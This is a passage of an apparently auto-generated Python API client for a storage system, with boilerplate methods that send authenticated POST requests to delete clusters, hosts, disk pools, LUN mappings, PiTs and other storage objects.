body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_async_mirror_group_incomplete_member(self, system_id, body, **kwargs):
"""
This procedure is used to clean up a mirror \"place holder.\"
Documented return codes: ok, invalidIncompleteMemberRef, arvmGroupNotSecondary, remoteInternalError, arvmRemoteMirrorMemberDoesNotExist, arvmRemoteGroupDoesNotExist, remoteDatabaseError.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_async_mirror_group_incomplete_member(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: An object with all of the required attributes to delete an incomplete member of an Asynchronous Mirror Group. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_async_mirror_group_incomplete_member" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_async_mirror_group_incomplete_member`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_async_mirror_group_incomplete_member`")
resource_path = '/storage-systems/{system-id}/symbol/deleteAsyncMirrorGroupIncompleteMember'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_cgpit(self, system_id, body, **kwargs):
"""
This procedure will delete a PiT in one or more members of a consistency group.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_cgpit(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param PITConsistencyGroupPITDeletionDescriptor body: Structure containing information about the consistency group PiT to delete. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_cgpit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_cgpit`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_cgpit`")
resource_path = '/storage-systems/{system-id}/symbol/deleteCGPIT'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_cluster(self, system_id, body, **kwargs):
"""
This procedure causes the Cluster object identified by the argument value to be deleted from the Storage Partitions configuration.
Documented return codes: ok, partNodeNonexistent.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_cluster(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The ClusterRef value for the cluster to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_cluster" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_cluster`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_cluster`")
resource_path = '/storage-systems/{system-id}/symbol/deleteCluster'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_disk_pool(self, system_id, body, **kwargs):
"""
This procedure is used to delete a disk pool and all volumes in that pool.
Documented return codes: ok, diskPoolNotEmpty.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_disk_pool(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to the volume group to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_disk_pool" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_disk_pool`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_disk_pool`")
resource_path = '/storage-systems/{system-id}/symbol/deleteDiskPool'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_flash_cache(self, system_id, body, **kwargs):
"""
This procedure deletes the High Level Volume, the RAID Volumes on the SSD, and disables flash caching on any associated user volumes.
Documented return codes: ok, error, noHeap, internalError, invalidVolumeref, notFlashcacheVol, flashcacheDeleted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_flash_cache(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to the flash cache object to delete. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_flash_cache" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_flash_cache`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_flash_cache`")
resource_path = '/storage-systems/{system-id}/symbol/deleteFlashCache'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_host(self, system_id, body, **kwargs):
"""
This procedure causes the Host object identified by the argument value to be deleted from the Storage Partitions configuration.
Documented return codes: ok, partNodeNonexistent.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_host(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The HostRef value for the host to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_host" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_host`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_host`")
resource_path = '/storage-systems/{system-id}/symbol/deleteHost'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_host_port(self, system_id, body, **kwargs):
"""
This procedure causes the HostPort object identified by the argument value to be deleted from the Storage Partitions configuration.
Documented return codes: ok, partNodeNonexistent.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_host_port(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The HostPortRef value for the host port to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_host_port" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_host_port`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_host_port`")
resource_path = '/storage-systems/{system-id}/symbol/deleteHostPort'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_initiator(self, system_id, body, **kwargs):
"""
This procedure deletes an initiator object.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_initiator(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A ScsiNodeRef object that identifies the initiator to delete. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_initiator" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_initiator`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_initiator`")
resource_path = '/storage-systems/{system-id}/symbol/deleteInitiator'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_key_value_tag(self, system_id, body, **kwargs):
"""
This procedure removes from the array the specified key-value tags. It is an error to remove in-use key-value tags.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_key_value_tag(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param KeyValueTagRefList body: The input identifies the key-value pairs to be deleted from the array. Unknown references are ignored. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_key_value_tag" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_key_value_tag`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_key_value_tag`")
resource_path = '/storage-systems/{system-id}/symbol/deleteKeyValueTag'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_key_value_tag_mapping(self, system_id, body, **kwargs):
"""
This procedure removes from the specified volumes all references to specific Key-Value tags.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_key_value_tag_mapping(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param KeyValueTagMappingDeletionDescriptorList body: The input is a list of references to Volumes (or Workloads). For each in the list, all references to Key-Value tags are deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_key_value_tag_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_key_value_tag_mapping`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_key_value_tag_mapping`")
resource_path = '/storage-systems/{system-id}/symbol/deleteKeyValueTagMapping'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_lun_mapping(self, system_id, body, **kwargs):
"""
This procedure causes the LUNMapping object identified by the argument value to be deleted from the Storage Partitions configuration.
Documented return codes: ok, partNodeNonexistent.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_lun_mapping(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The LUNMappingRef value for the mapping to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_lun_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_lun_mapping`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_lun_mapping`")
resource_path = '/storage-systems/{system-id}/symbol/deleteLUNMapping'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_mgmt_client_records(self, system_id, body, **kwargs):
"""
This procedure deletes a range of (i.e. one or more) specified MgmtCleintRecords.
Documented return codes: ok, noHeap, volumeNotExist, databaseError.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_mgmt_client_records(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param MgmtClientRecordDeleteDescriptor body: The MgmtClientRecordDeleteDescriptor value. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_mgmt_client_records" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_mgmt_client_records`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_mgmt_client_records`")
resource_path = '/storage-systems/{system-id}/symbol/deleteMgmtClientRecords'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_pit(self, system_id, body, **kwargs):
"""
This procedure will delete one or more PiTs.
Documented return codes: ok, rollbackInProgress, invalidPitRef, notOldestPit, pitInConsistencyGroup.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_pit(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param PITRefList body: Structure containing a list of PiTs. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_pit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit`")
resource_path = '/storage-systems/{system-id}/symbol/deletePIT'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
